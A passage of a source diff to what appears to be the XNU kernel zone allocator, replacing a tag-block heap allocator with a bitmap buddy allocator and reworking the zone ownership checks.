+ *ze = zone_element_encode(page, eidx, ZPM_AUTO); return meta; } -__attribute__((always_inline)) -void -zone_allocated_element_validate(zone_t zone, vm_offset_t addr) -{ - zone_allocated_element_resolve(zone, addr, NULL, NULL); -} - -__header_always_inline vm_offset_t -zone_page_meta_get_freelist(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t page) -{ - assert(!meta->zm_secondary_page); - if (meta->zm_freelist_offs == PAGE_METADATA_EMPTY_FREELIST) { - return 0; - } - - vm_size_t size = ptoa(meta->zm_percpu ? 
1 : meta->zm_page_count); - if (meta->zm_freelist_offs + zone_elem_size(zone) > size) { - zone_metadata_corruption(zone, meta, "freelist corruption"); - } - - return page + meta->zm_freelist_offs; -} - -__header_always_inline void -zone_page_meta_set_freelist(struct zone_page_metadata *meta, - vm_offset_t page, vm_offset_t addr) -{ - assert(!meta->zm_secondary_page); - if (addr) { - meta->zm_freelist_offs = (uint16_t)(addr - page); - } else { - meta->zm_freelist_offs = PAGE_METADATA_EMPTY_FREELIST; - } -} - -static bool -zone_page_meta_is_sane_element(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t page, vm_offset_t element, zone_addr_kind_t kind) -{ - if (element == 0) { - /* ends of the freelist are NULL */ - return true; - } - if (element < page + ZONE_PAGE_FIRST_OFFSET(kind)) { - return false; - } - vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count); - if (element > page + size - zone_elem_size(zone)) { - return false; - } - return true; -} - /* Routine to get the size of a zone allocated address. * If the address doesnt belong to the zone maps, returns 0. 
*/ vm_size_t zone_element_size(void *addr, zone_t *z) { - struct zone_page_metadata *meta; struct zone *src_zone; - if (from_zone_map(addr, sizeof(void *))) { - meta = zone_native_meta_from_addr(addr); - src_zone = &zone_array[meta->zm_index]; + if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) || + from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) { + src_zone = &zone_array[zone_index_from_ptr(addr)]; if (z) { *z = src_zone; } return zone_elem_size(src_zone); } + #if CONFIG_GZALLOC if (__improbable(gzalloc_enabled())) { vm_size_t gzsize; @@ -993,11 +1214,11 @@ zone_require_panic(zone_t zone, void *addr) uint32_t zindex; zone_t other; - if (!from_zone_map(addr, zone_elem_size(zone))) { + if (!from_zone_map(addr, zone_elem_size(zone), ZONE_ADDR_NATIVE)) { panic("zone_require failed: address not in a zone (addr: %p)", addr); } - zindex = zone_native_meta_from_addr(addr)->zm_index; + zindex = zone_index_from_ptr(addr); other = &zone_array[zindex]; if (zindex >= os_atomic_load(&num_zones, relaxed) || !other->z_self) { panic("zone_require failed: invalid zone index %d " @@ -1031,5116 +1252,7322 @@ zone_id_require_panic(zone_id_t zid, void *addr) void zone_require(zone_t zone, void *addr) { - if (__probable(from_general_submap(addr, zone_elem_size(zone)) && - (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) { - return; - } + vm_size_t esize = zone_elem_size(zone); + + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + if (zone_has_index(zone, zone_index_from_ptr(addr))) { + return; + } #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone->gzalloc_tracked)) { return; - } #endif + } zone_require_panic(zone, addr); } void zone_id_require(zone_id_t zid, vm_size_t esize, void *addr) { - if (__probable(from_general_submap(addr, esize) && - (zid == zone_native_meta_from_addr(addr)->zm_index))) { + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + if (zid == 
zone_index_from_ptr(addr)) { + return; + } +#if CONFIG_GZALLOC + } else if (__probable(zone_array[zid].gzalloc_tracked)) { return; +#endif } + zone_id_require_panic(zid, addr); +} + +void +zone_id_require_allow_foreign(zone_id_t zid, vm_size_t esize, void *addr) +{ + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE) || + from_zone_map(addr, esize, ZONE_ADDR_FOREIGN))) { + if (zid == zone_index_from_ptr(addr)) { + return; + } #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone_array[zid].gzalloc_tracked)) { return; - } #endif + } zone_id_require_panic(zid, addr); } bool zone_owns(zone_t zone, void *addr) { - if (__probable(from_general_submap(addr, zone_elem_size(zone)) && - (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) { - return true; - } + vm_size_t esize = zone_elem_size(zone); + + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + return zone_has_index(zone, zone_index_from_ptr(addr)); #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone->gzalloc_tracked)) { return true; - } #endif + } return false; } -#pragma mark ZTAGS -#if VM_MAX_TAG_ZONES +#endif /* !ZALLOC_TEST */ +#pragma mark Zone bits allocator -// for zones with tagging enabled: +/*! + * @defgroup Zone Bitmap allocator + * @{ + * + * @brief + * Functions implementing the zone bitmap allocator + * + * @discussion + * The zone allocator maintains which elements are allocated or free in bitmaps. + * + * When the number of elements per page is smaller than 32, it is stored inline + * on the @c zone_page_metadata structure (@c zm_inline_bitmap is set, + * and @c zm_bitmap used for storage). + * + * When the number of elements is larger, then a bitmap is allocated from + * a buddy allocator (impelemented under the @c zba_* namespace). Pointers + * to bitmaps are implemented as a packed 32 bit bitmap reference, stored in + * @c zm_bitmap. 
The low 3 bits encode the scale (order) of the allocation in + * @c ZBA_GRANULE units, and hence actual allocations encoded with that scheme + * cannot be larger than 1024 bytes (8192 bits). + * + * This buddy allocator can actually accomodate allocations as large + * as 8k on 16k systems and 2k on 4k systems. + * + * Note: @c zba_* functions are implementation details not meant to be used + * outside of the allocation of the allocator itself. Interfaces to the rest of + * the zone allocator are documented and not @c zba_* prefixed. + */ -// calculate a pointer to the tag base entry, -// holding either a uint32_t the first tag offset for a page in the zone map, -// or two uint16_t tags if the page can only hold one or two elements +#define ZBA_CHUNK_SIZE PAGE_MAX_SIZE +#define ZBA_GRANULE sizeof(uint64_t) +#define ZBA_GRANULE_BITS (8 * sizeof(uint64_t)) +#define ZBA_MAX_ORDER (PAGE_MAX_SHIFT - 4) +#define ZBA_MAX_ALLOC_ORDER 7 +#define ZBA_SLOTS (ZBA_CHUNK_SIZE / ZBA_GRANULE) +static_assert(2ul * ZBA_GRANULE << ZBA_MAX_ORDER == ZBA_CHUNK_SIZE, "chunk sizes"); +static_assert(ZBA_MAX_ALLOC_ORDER <= ZBA_MAX_ORDER, "ZBA_MAX_ORDER is enough"); + +struct zone_bits_chain { + uint32_t zbc_next; + uint32_t zbc_prev; +} __attribute__((aligned(ZBA_GRANULE))); + +struct zone_bits_head { + uint32_t zbh_next; + uint32_t zbh_unused; +} __attribute__((aligned(ZBA_GRANULE))); + +static_assert(sizeof(struct zone_bits_chain) == ZBA_GRANULE, "zbc size"); +static_assert(sizeof(struct zone_bits_head) == ZBA_GRANULE, "zbh size"); + +struct zone_bits_allocator_meta { + uint32_t zbam_chunks; + uint32_t __zbam_padding; + struct zone_bits_head zbam_lists[ZBA_MAX_ORDER + 1]; +}; -#define ZTAGBASE(zone, element) \ - (&((uint32_t *)zone_tagbase_min)[atop((element) - zone_info.zi_map_range.min_address)]) +struct zone_bits_allocator_header { + uint64_t zbah_bits[ZBA_SLOTS / (8 * sizeof(uint64_t))]; +}; -// pointer to the tag for an element -#define ZTAG(zone, element) \ - ({ \ - vm_tag_t * 
result; \ - if ((zone)->tags_inline) { \ - result = (vm_tag_t *) ZTAGBASE((zone), (element)); \ - if ((page_mask & element) >= zone_elem_size(zone)) result++; \ - } else { \ - result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE((zone), (element))[0] + ((element) & page_mask) / zone_elem_size((zone))]; \ - } \ - result; \ - }) +#if ZALLOC_TEST +static struct zalloc_bits_allocator_test_setup { + vm_offset_t zbats_base; + void (*zbats_populate)(vm_address_t addr, vm_size_t size); +} zba_test_info; +static struct zone_bits_allocator_header * +zba_base_header(void) +{ + return (struct zone_bits_allocator_header *)zba_test_info.zbats_base; +} -static vm_offset_t zone_tagbase_min; -static vm_offset_t zone_tagbase_max; -static vm_offset_t zone_tagbase_map_size; -static vm_map_t zone_tagbase_map; +static void +zba_populate(uint32_t n) +{ + vm_address_t base = zba_test_info.zbats_base; + zba_test_info.zbats_populate(base + n * ZBA_CHUNK_SIZE, ZBA_CHUNK_SIZE); +} +#else +__startup_data +static uint8_t zba_chunk_startup[ZBA_CHUNK_SIZE] +__attribute__((aligned(ZBA_CHUNK_SIZE))); +static LCK_MTX_EARLY_DECLARE(zba_mtx, &zone_locks_grp); -static vm_offset_t zone_tags_min; -static vm_offset_t zone_tags_max; -static vm_offset_t zone_tags_map_size; -static vm_map_t zone_tags_map; +static struct zone_bits_allocator_header * +zba_base_header(void) +{ + return (struct zone_bits_allocator_header *)zone_info.zi_bits_range.min_address; +} -// simple heap allocator for allocating the tags for new memory +static void +zba_lock(void) +{ + lck_mtx_lock(&zba_mtx); +} -LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */ +static void +zba_unlock(void) +{ + lck_mtx_unlock(&zba_mtx); +} -enum{ - ztFreeIndexCount = 8, - ztFreeIndexMax = (ztFreeIndexCount - 1), - ztTagsPerBlock = 4 -}; +static void +zba_populate(uint32_t n) +{ + vm_size_t size = ZBA_CHUNK_SIZE; + vm_address_t addr; -struct ztBlock { -#if __LITTLE_ENDIAN__ - uint64_t free:1, - next:21, - prev:21, - size:21; -#else -// ztBlock 
needs free bit least significant -#error !__LITTLE_ENDIAN__ + addr = zone_info.zi_bits_range.min_address + n * size; + if (addr >= zone_info.zi_bits_range.max_address) { + zone_t z = zone_find_largest(); + panic("zba_populate: out of bitmap space, " + "likely due to memory leak in zone [%s%s] " + "(%luM, %d elements allocated)", + zone_heap_name(z), zone_name(z), + (unsigned long)zone_size_wired(z) >> 20, + zone_count_allocated(z)); + } + + for (;;) { + kern_return_t kr = KERN_SUCCESS; + + if (0 == pmap_find_phys(kernel_pmap, addr)) { + kr = kernel_memory_populate(kernel_map, addr, size, + KMA_NOPAGEWAIT | KMA_KOBJECT | KMA_ZERO, + VM_KERN_MEMORY_OSFMK); + } + + if (kr == KERN_SUCCESS) { + return; + } + + zba_unlock(); + VM_PAGE_WAIT(); + zba_lock(); + } +} #endif -}; -typedef struct ztBlock ztBlock; -static ztBlock * ztBlocks; -static uint32_t ztBlocksCount; -static uint32_t ztBlocksFree; +__pure2 +static struct zone_bits_allocator_meta * +zba_meta(void) +{ + return (struct zone_bits_allocator_meta *)&zba_base_header()[1]; +} + +__pure2 +static uint64_t * +zba_slot_base(void) +{ + return (uint64_t *)zba_base_header(); +} + +__pure2 +static vm_address_t +zba_page_addr(uint32_t n) +{ + return (vm_address_t)zba_base_header() + n * ZBA_CHUNK_SIZE; +} + +__pure2 +static struct zone_bits_head * +zba_head(uint32_t order) +{ + return &zba_meta()->zbam_lists[order]; +} +__pure2 static uint32_t -ztLog2up(uint32_t size) +zba_head_index(uint32_t order) { - if (1 == size) { - size = 0; - } else { - size = 32 - __builtin_clz(size - 1); - } - return size; + uint32_t hdr_size = sizeof(struct zone_bits_allocator_header) + + offsetof(struct zone_bits_allocator_meta, zbam_lists); + return (hdr_size / ZBA_GRANULE) + order; } +__pure2 +static struct zone_bits_chain * +zba_chain_for_index(uint32_t index) +{ + return (struct zone_bits_chain *)(zba_slot_base() + index); +} + +__pure2 static uint32_t -ztLog2down(uint32_t size) +zba_chain_to_index(const struct zone_bits_chain *zbc) { - 
size = 31 - __builtin_clz(size); - return size; + return (uint32_t)((const uint64_t *)zbc - zba_slot_base()); } +__abortlike static void -ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags) +zba_head_corruption_panic(uint32_t order) { - vm_map_offset_t addr = (vm_map_offset_t) address; - vm_map_offset_t page, end; + panic("zone bits allocator head[%d:%p] is corrupt", order, + zba_head(order)); +} - page = trunc_page(addr); - end = round_page(addr + size); +__abortlike +static void +zba_chain_corruption_panic(struct zone_bits_chain *a, struct zone_bits_chain *b) +{ + panic("zone bits allocator freelist is corrupt (%p <-> %p)", a, b); +} - for (; page < end; page += page_size) { - if (!pmap_find_phys(kernel_pmap, page)) { - kern_return_t __unused - ret = kernel_memory_populate(map, page, PAGE_SIZE, - KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG); - assert(ret == KERN_SUCCESS); +static void +zba_push_block(struct zone_bits_chain *zbc, uint32_t order) +{ + struct zone_bits_head *hd = zba_head(order); + uint32_t hd_index = zba_head_index(order); + uint32_t index = zba_chain_to_index(zbc); + struct zone_bits_chain *next; + + if (hd->zbh_next) { + next = zba_chain_for_index(hd->zbh_next); + if (next->zbc_prev != hd_index) { + zba_head_corruption_panic(order); } + next->zbc_prev = index; } + zbc->zbc_next = hd->zbh_next; + zbc->zbc_prev = hd_index; + hd->zbh_next = index; } -static boolean_t -ztPresent(const void * address, size_t size) +static void +zba_remove_block(struct zone_bits_chain *zbc) { - vm_map_offset_t addr = (vm_map_offset_t) address; - vm_map_offset_t page, end; - boolean_t result; + struct zone_bits_chain *prev = zba_chain_for_index(zbc->zbc_prev); + uint32_t index = zba_chain_to_index(zbc); - page = trunc_page(addr); - end = round_page(addr + size); - for (result = TRUE; (page < end); page += page_size) { - result = pmap_find_phys(kernel_pmap, page); - if (!result) { - break; + if (prev->zbc_next != index) { + 
zba_chain_corruption_panic(prev, zbc); + } + if ((prev->zbc_next = zbc->zbc_next)) { + struct zone_bits_chain *next = zba_chain_for_index(zbc->zbc_next); + if (next->zbc_prev != index) { + zba_chain_corruption_panic(zbc, next); } + next->zbc_prev = zbc->zbc_prev; } - return result; } - -void __unused -ztDump(boolean_t sanity); -void __unused -ztDump(boolean_t sanity) +static vm_address_t +zba_try_pop_block(uint32_t order) { - uint32_t q, cq, p; + struct zone_bits_head *hd = zba_head(order); + struct zone_bits_chain *zbc; - for (q = 0; q <= ztFreeIndexMax; q++) { - p = q; - do{ - if (sanity) { - cq = ztLog2down(ztBlocks[p].size); - if (cq > ztFreeIndexMax) { - cq = ztFreeIndexMax; - } - if (!ztBlocks[p].free - || ((p != q) && (q != cq)) - || (ztBlocks[ztBlocks[p].next].prev != p) - || (ztBlocks[ztBlocks[p].prev].next != p)) { - kprintf("zterror at %d", p); - ztDump(FALSE); - kprintf("zterror at %d", p); - assert(FALSE); - } - continue; - } - kprintf("zt[%03d]%c %d, %d, %d\n", - p, ztBlocks[p].free ? 
'F' : 'A', - ztBlocks[p].next, ztBlocks[p].prev, - ztBlocks[p].size); - p = ztBlocks[p].next; - if (p == q) { - break; - } - }while (p != q); - if (!sanity) { - printf("\n"); - } - } - if (!sanity) { - printf("-----------------------\n"); + if (hd->zbh_next == 0) { + return 0; } + + zbc = zba_chain_for_index(hd->zbh_next); + zba_remove_block(zbc); + return (vm_address_t)zbc; } +static struct zone_bits_allocator_header * +zba_header(vm_offset_t addr) +{ + addr &= -(vm_offset_t)ZBA_CHUNK_SIZE; + return (struct zone_bits_allocator_header *)addr; +} +static size_t +zba_node_parent(size_t node) +{ + return (node - 1) / 2; +} -#define ZTBDEQ(idx) \ - ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next; \ - ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev; +static size_t +zba_node_left_child(size_t node) +{ + return node * 2 + 1; +} -static void -ztFree(zone_t zone __unused, uint32_t index, uint32_t count) +static size_t +zba_node_buddy(size_t node) { - uint32_t q, w, p, size, merge; + return ((node - 1) ^ 1) + 1; +} - assert(count); - ztBlocksFree += count; +static size_t +zba_node(vm_offset_t addr, uint32_t order) +{ + vm_offset_t offs = (addr % ZBA_CHUNK_SIZE) / ZBA_GRANULE; + return (offs >> order) + (1 << (ZBA_MAX_ORDER - order + 1)) - 1; +} - // merge with preceding - merge = (index + count); - if ((merge < ztBlocksCount) - && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) - && ztBlocks[merge].free) { - ZTBDEQ(merge); - count += ztBlocks[merge].size; - } - - // merge with following - merge = (index - 1); - if ((merge > ztFreeIndexMax) - && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) - && ztBlocks[merge].free) { - size = ztBlocks[merge].size; - count += size; - index -= size; - ZTBDEQ(index); - } - - q = ztLog2down(count); - if (q > ztFreeIndexMax) { - q = ztFreeIndexMax; - } - w = q; - // queue in order of size - while (TRUE) { - p = ztBlocks[w].next; - if (p == q) { - break; - } - if (ztBlocks[p].size >= count) { - break; - } - w = 
p; - } - ztBlocks[p].prev = index; - ztBlocks[w].next = index; - - // fault in first - ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); - - // mark first & last with free flag and size - ztBlocks[index].free = TRUE; - ztBlocks[index].size = count; - ztBlocks[index].prev = w; - ztBlocks[index].next = p; - if (count > 1) { - index += (count - 1); - // fault in last - ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0); - ztBlocks[index].free = TRUE; - ztBlocks[index].size = count; - } +static struct zone_bits_chain * +zba_chain_for_node(struct zone_bits_allocator_header *zbah, size_t node, uint32_t order) +{ + vm_offset_t offs = (node - (1 << (ZBA_MAX_ORDER - order + 1)) + 1) << order; + return (struct zone_bits_chain *)((vm_offset_t)zbah + offs * ZBA_GRANULE); } -static uint32_t -ztAlloc(zone_t zone, uint32_t count) +static void +zba_node_flip_split(struct zone_bits_allocator_header *zbah, size_t node) { - uint32_t q, w, p, leftover; - - assert(count); - - q = ztLog2up(count); - if (q > ztFreeIndexMax) { - q = ztFreeIndexMax; - } - do{ - w = q; - while (TRUE) { - p = ztBlocks[w].next; - if (p == q) { - break; - } - if (ztBlocks[p].size >= count) { - // dequeue, mark both ends allocated - ztBlocks[w].next = ztBlocks[p].next; - ztBlocks[ztBlocks[p].next].prev = w; - ztBlocks[p].free = FALSE; - ztBlocksFree -= ztBlocks[p].size; - if (ztBlocks[p].size > 1) { - ztBlocks[p + ztBlocks[p].size - 1].free = FALSE; - } - - // fault all the allocation - ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0); - // mark last as allocated - if (count > 1) { - ztBlocks[p + count - 1].free = FALSE; - } - // free remainder - leftover = ztBlocks[p].size - count; - if (leftover) { - ztFree(zone, p + ztBlocks[p].size - leftover, leftover); - } - - return p; - } - w = p; - } - q++; - }while (q <= ztFreeIndexMax); + zbah->zbah_bits[node / 64] ^= 1ull << (node % 64); +} - return -1U; +static bool +zba_node_is_split(struct 
zone_bits_allocator_header *zbah, size_t node) +{ + return zbah->zbah_bits[node / 64] & (1ull << (node % 64)); } -__startup_func static void -zone_tagging_init(vm_size_t max_zonemap_size) +zba_free(vm_offset_t addr, uint32_t order) { - kern_return_t ret; - vm_map_kernel_flags_t vmk_flags; - uint32_t idx; - - // allocate submaps VM_KERN_MEMORY_DIAG - - zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t); - vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size, - FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, - &zone_tagbase_map); + struct zone_bits_allocator_header *zbah = zba_header(addr); + struct zone_bits_chain *zbc; + size_t node = zba_node(addr, order); - if (ret != KERN_SUCCESS) { - panic("zone_init: kmem_suballoc failed"); - } - zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size); + while (node) { + size_t parent = zba_node_parent(node); - zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t); - vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size, - FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG, - &zone_tags_map); + zba_node_flip_split(zbah, parent); + if (zba_node_is_split(zbah, parent)) { + break; + } - if (ret != KERN_SUCCESS) { - panic("zone_init: kmem_suballoc failed"); + zbc = zba_chain_for_node(zbah, zba_node_buddy(node), order); + zba_remove_block(zbc); + order++; + node = parent; } - zone_tags_max = zone_tags_min + round_page(zone_tags_map_size); - - ztBlocks = (ztBlock *) zone_tags_min; - ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock)); - // initialize the qheads - lck_mtx_lock(&ztLock); + zba_push_block(zba_chain_for_node(zbah, node, order), order); +} - ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0); - for (idx = 0; idx < ztFreeIndexCount; idx++) { - ztBlocks[idx].free = TRUE; - 
ztBlocks[idx].next = idx; - ztBlocks[idx].prev = idx; - ztBlocks[idx].size = 0; +static vm_size_t +zba_chunk_header_size(uint32_t n) +{ + vm_size_t hdr_size = sizeof(struct zone_bits_allocator_header); + if (n == 0) { + hdr_size += sizeof(struct zone_bits_allocator_meta); } - // free remaining space - ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount); - - lck_mtx_unlock(&ztLock); + return hdr_size; } static void -ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size) +zba_init_chunk(uint32_t n) { - uint32_t * tagbase; - uint32_t count, block, blocks, idx; - size_t pages; - - pages = atop(size); - tagbase = ZTAGBASE(zone, mem); - - lck_mtx_lock(&ztLock); + vm_size_t hdr_size = zba_chunk_header_size(n); + vm_offset_t page = zba_page_addr(n); + struct zone_bits_allocator_header *zbah = zba_header(page); + vm_size_t size = ZBA_CHUNK_SIZE; + size_t node; - // fault tagbase - ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0); - - if (!zone->tags_inline) { - // allocate tags - count = (uint32_t)(size / zone_elem_size(zone)); - blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); - block = ztAlloc(zone, blocks); - if (-1U == block) { - ztDump(false); + for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) { + if (size < hdr_size + (ZBA_GRANULE << o)) { + continue; } - assert(-1U != block); + size -= ZBA_GRANULE << o; + node = zba_node(page + size, o); + zba_node_flip_split(zbah, zba_node_parent(node)); + zba_push_block(zba_chain_for_node(zbah, node, o), o); } - lck_mtx_unlock(&ztLock); - - if (!zone->tags_inline) { - // set tag base for each page - block *= ztTagsPerBlock; - for (idx = 0; idx < pages; idx++) { - vm_offset_t esize = zone_elem_size(zone); - tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize); - } - } + zba_meta()->zbam_chunks = n + 1; } +__attribute__((noinline)) static void -ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size) +zba_grow(void) { - uint32_t * tagbase; - uint32_t count, block, blocks, idx; - 
size_t pages; - - // set tag base for each page - pages = atop(size); - tagbase = ZTAGBASE(zone, mem); - block = tagbase[0]; - for (idx = 0; idx < pages; idx++) { - tagbase[idx] = 0xFFFFFFFF; - } + uint32_t chunk = zba_meta()->zbam_chunks; - lck_mtx_lock(&ztLock); - if (!zone->tags_inline) { - count = (uint32_t)(size / zone_elem_size(zone)); - blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock); - assert(block != 0xFFFFFFFF); - block /= ztTagsPerBlock; - ztFree(NULL /* zone is unlocked */, block, blocks); + zba_populate(chunk); + if (zba_meta()->zbam_chunks == chunk) { + zba_init_chunk(chunk); } - - lck_mtx_unlock(&ztLock); } -uint32_t -zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size) +static vm_offset_t +zba_alloc(uint32_t order) { - simple_lock(&all_zones_lock, &zone_locks_grp); + struct zone_bits_allocator_header *zbah; + uint32_t cur = order; + vm_address_t addr; + size_t node; - zone_index_foreach(idx) { - zone_t z = &zone_array[idx]; - if (!z->tags) { - continue; - } - if (tag_zone_index != z->tag_zone_index) { - continue; + while ((addr = zba_try_pop_block(cur)) == 0) { + if (cur++ >= ZBA_MAX_ORDER) { + zba_grow(); + cur = order; } - - *elem_size = zone_elem_size(z); - simple_unlock(&all_zones_lock); - return idx; } - simple_unlock(&all_zones_lock); + zbah = zba_header(addr); + node = zba_node(addr, cur); + zba_node_flip_split(zbah, zba_node_parent(node)); + while (cur > order) { + cur--; + zba_node_flip_split(zbah, node); + node = zba_node_left_child(node); + zba_push_block(zba_chain_for_node(zbah, node + 1, cur), cur); + } - return -1U; + return addr; } -#endif /* VM_MAX_TAG_ZONES */ -#pragma mark zalloc helpers +#define zba_map_index(type, n) (n / (8 * sizeof(type))) +#define zba_map_bit(type, n) ((type)1 << (n % (8 * sizeof(type)))) +#define zba_map_mask_lt(type, n) (zba_map_bit(type, n) - 1) +#define zba_map_mask_ge(type, n) ((type)-zba_map_bit(type, n)) -const char * -zone_name(zone_t z) +#if !ZALLOC_TEST +static uint32_t 
+zba_bits_ref_order(uint32_t bref) { - return z->z_name; + return bref & 0x7; } -const char * -zone_heap_name(zone_t z) +static bitmap_t * +zba_bits_ref_ptr(uint32_t bref) { - if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) { - return kalloc_heap_names[z->kalloc_heap]; - } - return "invalid"; + return zba_slot_base() + (bref >> 3); } -static inline vm_size_t -zone_submaps_approx_size(void) +static vm_offset_t +zba_scan_bitmap_inline(zone_t zone, struct zone_page_metadata *meta, + vm_offset_t eidx) { - vm_size_t size = 0; + size_t i = eidx / 32; + uint32_t map; - for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { - size += zone_submaps[idx]->size; + if (eidx % 32) { + map = meta[i].zm_bitmap & zba_map_mask_ge(uint32_t, eidx); + if (map) { + eidx = __builtin_ctz(map); + meta[i].zm_bitmap ^= 1u << eidx; + return i * 32 + eidx; + } + i++; } - return size; -} + uint32_t chunk_len = meta->zm_chunk_len; + if (chunk_len == 1 && zone->z_percpu) { + chunk_len = zpercpu_count(); + } + for (int j = 0; j < chunk_len; j++, i++) { + if (i >= chunk_len) { + i = 0; + } + if (__probable(map = meta[i].zm_bitmap)) { + meta[i].zm_bitmap &= map - 1; + return i * 32 + __builtin_ctz(map); + } + } -bool -zone_maps_owned(vm_address_t addr, vm_size_t size) -{ - return from_zone_map(addr, size); + zone_page_meta_accounting_panic(zone, meta, "zm_bitmap"); } -void -zone_map_sizes( - vm_map_size_t *psize, - vm_map_size_t *pfree, - vm_map_size_t *plargest_free) +static vm_offset_t +zba_scan_bitmap_ref(zone_t zone, struct zone_page_metadata *meta, + vm_offset_t eidx) { - vm_map_sizes(zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP], psize, pfree, plargest_free); -} + uint32_t bits_size = 1 << zba_bits_ref_order(meta->zm_bitmap); + bitmap_t *bits = zba_bits_ref_ptr(meta->zm_bitmap); + size_t i = eidx / 64; + uint64_t map; -vm_map_t -zone_submap(zone_t zone) -{ - return submap_for_zone(zone); + if (eidx % 64) { + map = bits[i] & zba_map_mask_ge(uint64_t, eidx); + if (map) { + eidx = 
__builtin_ctzll(map); + bits[i] ^= 1ull << eidx; + return i * 64 + eidx; + } + i++; + } + + for (int j = 0; j < bits_size; i++, j++) { + if (i >= bits_size) { + i = 0; + } + if (__probable(map = bits[i])) { + bits[i] &= map - 1; + return i * 64 + __builtin_ctzll(map); + } + } + + zone_page_meta_accounting_panic(zone, meta, "zm_bitmap"); } -unsigned -zpercpu_count(void) +/*! + * @function zone_meta_find_and_clear_bit + * + * @brief + * The core of the bitmap allocator: find a bit set in the bitmaps. + * + * @discussion + * This method will round robin through available allocations, + * with a per-core memory of the last allocated element index allocated. + * + * This is done in order to avoid a fully LIFO behavior which makes exploiting + * double-free bugs way too practical. + * + * @param zone The zone we're allocating from. + * @param meta The main metadata for the chunk being allocated from. + */ +static vm_offset_t +zone_meta_find_and_clear_bit(zone_t zone, struct zone_page_metadata *meta) { - return zpercpu_early_count; + zone_stats_t zs = zpercpu_get(zone->z_stats); + vm_offset_t eidx = zs->zs_alloc_rr + 1; + + if (meta->zm_inline_bitmap) { + eidx = zba_scan_bitmap_inline(zone, meta, eidx); + } else { + eidx = zba_scan_bitmap_ref(zone, meta, eidx); + } + zs->zs_alloc_rr = (uint16_t)eidx; + return eidx; } -int -track_this_zone(const char *zonename, const char *logname) +/*! + * @function zone_meta_bits_init + * + * @brief + * Initializes the zm_bitmap field(s) for a newly assigned chunk. + * + * @param meta The main metadata for the initialized chunk. + * @param count The number of elements the chunk can hold + * (which might be partial for partially populated chunks). + * @param nbits The maximum nuber of bits that will be used. + */ +static void +zone_meta_bits_init(struct zone_page_metadata *meta, + uint32_t count, uint32_t nbits) { - unsigned int len; - const char *zc = zonename; - const char *lc = logname; - - /* - * Compare the strings. 
We bound the compare by MAX_ZONE_NAME. - */ + static_assert(ZONE_MAX_ALLOC_SIZE / ZONE_MIN_ELEM_SIZE <= + ZBA_GRANULE_BITS << ZBA_MAX_ORDER, "bitmaps will be large enough"); - for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) { + if (meta->zm_inline_bitmap) { /* - * If the current characters don't match, check for a space in - * in the zone name and a corresponding period in the log name. - * If that's not there, then the strings don't match. + * We're called with the metadata zm_bitmap fields already + * zeroed out. */ - - if (*zc != *lc && !(*zc == ' ' && *lc == '.')) { - break; + for (size_t i = 0; 32 * i < count; i++) { + if (32 * i + 32 <= count) { + meta[i].zm_bitmap = ~0u; + } else { + meta[i].zm_bitmap = zba_map_mask_lt(uint32_t, count); + } } + } else { + uint32_t order = flsll((nbits - 1) / ZBA_GRANULE_BITS); + uint64_t *bits; - /* - * The strings are equal so far. If we're at the end, then it's a match. - */ + assert(order <= ZBA_MAX_ALLOC_ORDER); + assert(count <= ZBA_GRANULE_BITS << order); - if (*zc == '\0') { - return TRUE; + zba_lock(); + bits = (uint64_t 